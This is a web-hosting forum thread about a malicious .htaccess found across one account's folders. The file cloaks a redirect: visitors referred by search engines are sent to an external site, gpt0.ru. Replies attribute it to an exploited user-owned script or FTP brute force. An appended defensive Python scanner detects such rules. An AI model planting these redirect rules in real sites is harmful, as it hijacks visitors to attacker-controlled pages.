Strange .htaccess file in public_html

splitech

Verified User
Joined
Sep 28, 2004
Messages
47
Customer just called, site was not working, being re-directed to an attached hacker site? We found this .htaccess file in just about every folder. Can you please advise how it got there?

RewriteEngine On
Options +FollowSymlinks
RewriteBase /
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://gpt0.ru/in.cgi?3 [R=301,L]
 
You must have an insecure script that allows writing to the folder.
 
What user owns the file? What were the permissions on the folders it was in?
 
"We found this .htaccess file in just about every folder"

Are you referring to just one domain ONLY (subfolders within the public_html of that domain) ?
 

Just one user has this problem, the files are owned by user.user

This seems like somehow a script is being exploited and allowing someone to write these changes to this .htaccess file. This file was found with those settings and the redirect to that URL in /home/user and /home/user/public_html
 
If the .htaccess files are owned by the user, then the exploited script is also owned by the user.

So for better or worse, depending on how you look at it, it's the user's issue.

Jeff
 
I would suggest you change the password for this user. There are generally a lot of FTP brute-force attacks on the servers.
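
A sweep for the pattern discussed in this thread, as an added example that is not part of the original posts: it walks an account's tree and reports every .htaccess that pairs HTTP_REFERER conditions with a RewriteRule pointing at an external host, along with the owner UID and mtime needed for the ownership question raised above. The function names, the sample rules and the redirect.invalid host are constructed for illustration.

```python
import os
import re

# A RewriteCond that tests the Referer header (visitor-conditional logic).
REFERER_COND = re.compile(r'^[ \t]*RewriteCond[ \t]+%\{HTTP_REFERER\}', re.I | re.M)
# A RewriteRule whose substitution is an absolute URL; group 2 is the host.
EXTERNAL_RULE = re.compile(
    r'^[ \t]*RewriteRule[ \t]+\S+[ \t]+(https?://([^/\s:?]+)\S*)', re.I | re.M)

# Constructed samples: an injected redirect and a benign hotlink-protection rule.
SAMPLE_BAD = r"""RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*
RewriteRule ^(.*)$ http://redirect.invalid/in.cgi?3 [R=301,L]
"""
SAMPLE_OK = r"""RewriteEngine On
RewriteCond %{HTTP_REFERER} !^https?://www\.example\.com/ [NC]
RewriteRule \.(jpg|png)$ - [F]
"""

def inspect_htaccess(text, own_hosts=()):
    """Return external redirect URLs if the file also tests the Referer."""
    if not REFERER_COND.search(text):
        return []
    own = {h.lower() for h in own_hosts}  # hosts the site legitimately redirects to
    return [url for url, host in EXTERNAL_RULE.findall(text)
            if host.lower() not in own]

def scan_tree(root, own_hosts=()):
    """Walk root; return (path, uid, mtime, targets) per suspicious .htaccess."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" not in files:
            continue
        path = os.path.join(dirpath, ".htaccess")
        try:
            with open(path, "r", errors="replace") as fh:
                targets = inspect_htaccess(fh.read(), own_hosts)
            st = os.stat(path)
        except OSError:
            continue  # unreadable file: skip rather than abort the sweep
        if targets:
            findings.append((path, st.st_uid, int(st.st_mtime), targets))
    return findings

if __name__ == "__main__":
    import sys
    for finding in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(*finding)
```

The reported mtime can be lined up against FTP and web access logs for the same account to see which of the two explanations offered in the thread fits.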
 